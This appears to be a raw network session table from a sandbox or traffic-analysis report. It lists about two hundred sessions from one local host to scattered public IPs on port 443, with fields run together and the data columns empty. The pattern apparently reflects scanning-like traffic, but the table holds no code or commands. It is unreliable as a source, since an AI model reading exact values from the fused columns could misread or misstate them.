                                                  19838192.168.2.1355264134.251.32.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19839192.168.2.1359228202.200.42.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19840192.168.2.1334482111.217.198.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19841192.168.2.1339638105.47.39.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19842192.168.2.1333290205.234.191.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19843192.168.2.133757847.31.154.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19844192.168.2.1344008131.203.101.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19845192.168.2.1355194112.151.189.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19846192.168.2.1355668128.80.156.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19847192.168.2.1335922204.107.91.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19848192.168.2.1359498134.42.111.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19849192.168.2.1356598204.132.56.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19850192.168.2.1357356186.65.68.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19851192.168.2.133531269.237.181.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19852192.168.2.133842240.2.188.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19853192.168.2.1355810202.247.182.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19854192.168.2.1340966191.72.21.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19855192.168.2.1338540144.90.225.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19856192.168.2.134868043.215.241.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19857192.168.2.1347582153.31.82.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19858192.168.2.1359452172.132.196.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19859192.168.2.135781478.137.223.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19860192.168.2.1336524198.232.212.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19861192.168.2.13574789.111.188.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19862192.168.2.1352482162.158.150.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19863192.168.2.1345704111.31.169.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19864192.168.2.1347844168.8.139.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19865192.168.2.1360520123.121.34.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19866192.168.2.1333230197.143.6.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19867192.168.2.1346500199.189.5.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19868192.168.2.133849419.216.40.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19869192.168.2.1341404145.241.229.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19870192.168.2.1334318202.241.24.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19871192.168.2.133342034.228.104.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19872192.168.2.1336556198.40.78.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19873192.168.2.134126459.27.92.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19874192.168.2.134796642.210.96.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19875192.168.2.133598075.156.223.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19876192.168.2.1360482193.124.198.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19877192.168.2.133374827.53.180.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19878192.168.2.134391843.1.52.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19879192.168.2.1342276211.91.112.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19880192.168.2.1341566170.178.196.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19881192.168.2.1359008152.187.142.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19882192.168.2.1345598142.180.103.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19883192.168.2.1345318213.195.94.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19884192.168.2.1358872146.238.188.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19885192.168.2.135926481.100.67.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19886192.168.2.1336272209.123.173.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19887192.168.2.133726874.121.144.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19888192.168.2.1355078134.123.180.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19889192.168.2.1356526148.245.19.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19890192.168.2.1347058172.14.215.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19891192.168.2.134861886.122.125.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19892192.168.2.135046691.115.71.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19893192.168.2.13352541.87.26.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19894192.168.2.1341254150.88.199.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19895192.168.2.1348598132.97.120.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19896192.168.2.1348756156.99.132.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19897192.168.2.133752689.73.73.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19898192.168.2.1343884124.51.11.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19899192.168.2.1357668171.255.85.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19900192.168.2.134025419.255.128.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19901192.168.2.1350540187.194.171.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19902192.168.2.135255064.65.213.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19903192.168.2.1342042164.223.245.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19904192.168.2.1353484176.180.148.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19905192.168.2.1339454158.52.240.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19906192.168.2.133711864.191.212.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19907192.168.2.1348286122.253.110.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19908192.168.2.134569288.92.144.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19909192.168.2.1355224201.190.34.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19910192.168.2.1341940148.166.111.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19911192.168.2.1338982206.154.62.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19912192.168.2.134353014.107.219.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19913192.168.2.1355736116.110.144.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19914192.168.2.1358786199.22.91.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19915192.168.2.1346660123.160.198.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19916192.168.2.1348152108.65.141.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19917192.168.2.1352158116.226.96.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19918192.168.2.134038813.175.143.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19919192.168.2.1344704125.208.201.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19920192.168.2.1333098135.61.213.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19921192.168.2.1346406120.236.10.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19922192.168.2.134281058.129.47.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19923192.168.2.135140297.57.153.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19924192.168.2.134918084.230.111.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19925192.168.2.134192623.143.55.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19926192.168.2.1333910103.191.32.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19927192.168.2.1350978177.160.82.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19928192.168.2.1354262177.170.51.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19929192.168.2.135399631.116.142.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19930192.168.2.1358370168.20.178.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19931192.168.2.1359400160.137.29.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19932192.168.2.1337226221.57.67.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19933192.168.2.1355800153.180.170.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19934192.168.2.134512813.1.232.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19935192.168.2.134029077.161.103.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19936192.168.2.1359786118.65.30.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19937192.168.2.1343404154.16.42.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19938192.168.2.1352826207.220.139.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19939192.168.2.134696852.114.32.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19940192.168.2.1345074184.208.163.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19941192.168.2.1333674191.164.25.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19942192.168.2.135702279.21.243.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19943192.168.2.1332914195.49.80.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19944192.168.2.135802089.224.12.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19945192.168.2.1354768105.11.204.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19946192.168.2.135305870.220.55.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19947192.168.2.1352320117.243.250.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19948192.168.2.135782853.127.4.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19949192.168.2.1345900165.32.217.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19950192.168.2.1343350161.247.47.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19951192.168.2.134774432.242.113.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19952192.168.2.1337148145.251.183.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19953192.168.2.1338040120.147.141.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19954192.168.2.133850617.162.19.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19955192.168.2.134259246.117.12.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19956192.168.2.1342794136.3.114.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19957192.168.2.133297463.0.171.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19958192.168.2.1357358220.254.216.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19959192.168.2.1353390178.83.234.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19960192.168.2.13461565.198.71.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19961192.168.2.134166042.83.148.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19962192.168.2.135586860.244.123.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19963192.168.2.1333068148.127.152.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19964192.168.2.1343806193.138.38.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19965192.168.2.1350780141.59.71.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19966192.168.2.1352492142.164.141.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19967192.168.2.134728280.157.43.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19968192.168.2.1333282162.44.229.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19969192.168.2.1349058161.36.25.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19970192.168.2.133843418.42.220.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19971192.168.2.13418141.163.56.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19972192.168.2.1334000155.197.36.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19973192.168.2.1346872192.245.4.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19974192.168.2.1334828181.13.38.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19975192.168.2.135779685.11.119.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19976192.168.2.1344144138.127.79.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19977192.168.2.133860413.215.192.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19978192.168.2.1344776161.93.86.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19979192.168.2.135092478.233.78.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19980192.168.2.133878290.49.61.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19981192.168.2.1346136107.132.152.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19982192.168.2.1353550171.29.82.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19983192.168.2.1340916157.191.133.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19984192.168.2.133675252.170.193.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19985192.168.2.1336714180.129.161.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19986192.168.2.1351908156.150.98.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19987192.168.2.1348246126.181.79.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19988192.168.2.133686284.205.226.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19989192.168.2.134440878.22.126.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19990192.168.2.133399682.63.140.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19991192.168.2.133385239.189.175.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19992192.168.2.1344808138.174.88.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19993192.168.2.135003673.78.207.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19994192.168.2.1333958133.37.27.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19995192.168.2.1338502117.161.55.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19996192.168.2.1333404136.177.20.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19997192.168.2.134604018.203.107.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19998192.168.2.1353334143.222.136.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19999192.168.2.1351440141.128.124.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20000192.168.2.1333262150.241.46.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20001192.168.2.133352634.108.51.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20002192.168.2.134249670.113.131.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20003192.168.2.133619441.125.112.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20004192.168.2.1342472179.42.243.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20005192.168.2.135047258.61.8.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20006192.168.2.1354682182.235.117.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20007192.168.2.1348854149.6.155.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20008192.168.2.1354786223.177.173.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20009192.168.2.1344532173.230.101.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20010192.168.2.1359442203.140.76.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20011192.168.2.1344044149.130.18.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20012192.168.2.133568469.219.92.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20013192.168.2.1334586135.74.20.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20014192.168.2.13440282.31.8.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20015192.168.2.134843825.254.170.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20016192.168.2.1341628129.235.39.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20017192.168.2.135695267.141.250.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20018192.168.2.134437420.195.116.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20019192.168.2.1336404209.253.166.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20020192.168.2.134466672.193.202.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20021192.168.2.135122682.136.239.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20022192.168.2.1343370169.91.222.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20023192.168.2.1360598114.75.14.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20024192.168.2.1348928110.148.123.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20025192.168.2.135420692.4.120.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20026192.168.2.1358810207.117.135.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20027192.168.2.1333280110.47.153.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20028192.168.2.1342288111.4.144.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20029192.168.2.134642680.252.95.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20030192.168.2.1340944213.82.250.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20031192.168.2.136048263.254.181.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20032192.168.2.1343796180.217.130.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20033192.168.2.1341826120.51.144.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20034192.168.2.1337768184.67.98.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20035192.168.2.134742484.130.87.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20036192.168.2.1356596186.156.231.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20037192.168.2.1332974120.242.175.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20038192.168.2.1349130132.205.242.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20039192.168.2.1355618199.162.244.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20040192.168.2.1339614220.147.133.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20041192.168.2.135970220.64.72.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20042192.168.2.133949292.21.162.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20043192.168.2.135613620.63.117.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20044192.168.2.1343574187.87.43.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20045192.168.2.1343592113.173.76.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20046192.168.2.135137262.134.30.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20047192.168.2.1354382199.78.144.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20048192.168.2.1357580160.173.30.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20049192.168.2.1342560129.117.23.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20050192.168.2.1357530124.95.95.51443
